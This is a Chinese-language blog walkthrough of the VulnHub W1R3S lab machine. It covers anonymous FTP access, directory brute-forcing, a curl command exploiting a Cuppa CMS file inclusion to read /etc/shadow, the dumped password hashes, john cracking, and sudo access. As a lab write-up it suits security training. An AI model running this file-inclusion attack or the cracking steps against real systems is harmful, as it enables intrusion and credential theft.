红队打靶之VulnHub_W1R3S

Created At :
Views 👀 :
  1. W1R3S
  2. 目录爆破

W1R3S

打靶

ftp服务器一般就是这个默认的匿名登陆,你既然开了就要传文件的,这样肯定更方便一些,就尝试一下

ftp 192.168.240.129

输入anonymous回车登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
binary

//执行该命令,设置传输方式为二进制传输方式,防止存在二进制文件下载下来产生乱码

cd content

mget *.txt

//批量下载txt文件

cd ../docs/

mget *.txt

//批量下载txt文件

cd ../new-employees

mget *.txt

//批量下载txt文件

md5在线解密 https://www.somd5.com/

https://www.upsidedowntext.com/

目录爆破

dirb http://192.168.110.145

目测是网站建设页面被暴露,并且权限都为yes,可以作为攻击点,继续深入

那就进去 看看有没有可以上传shell的地方

不是root权限 找找这个Cuppa CMS 有什么漏洞先

搜一下有什么漏洞

1
searchsploit cuppa cms
1
searchsploit cuppa -m 25971

通过 $_REQUEST["urlConfig"] 参数包含的远程 URL 或者文件路径,可以导致服务器执行包含的 PHP 代码或读取非 PHP 文件内容。

1
http://192.168.110.145/administrator/alerts/alertConfigField.php

看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。

shadow文件用于存放密码。

1
2
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.110.145/administrator/alerts/alertConfigField.php

可以拿下,这样我们就可以去破解。我们把三个用户密码保存,使用john破解。

vim shadow.h

1
2
3
4
5
6
7
8
9
10


w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::



www-       data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::

john hash.txt

ssh

id后可以看到拥有27sudo的权限

用户有三个all权限

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com

💰

©2016-2023 answer77

Built with Hexo and 3-hexo theme

×

Help us with donation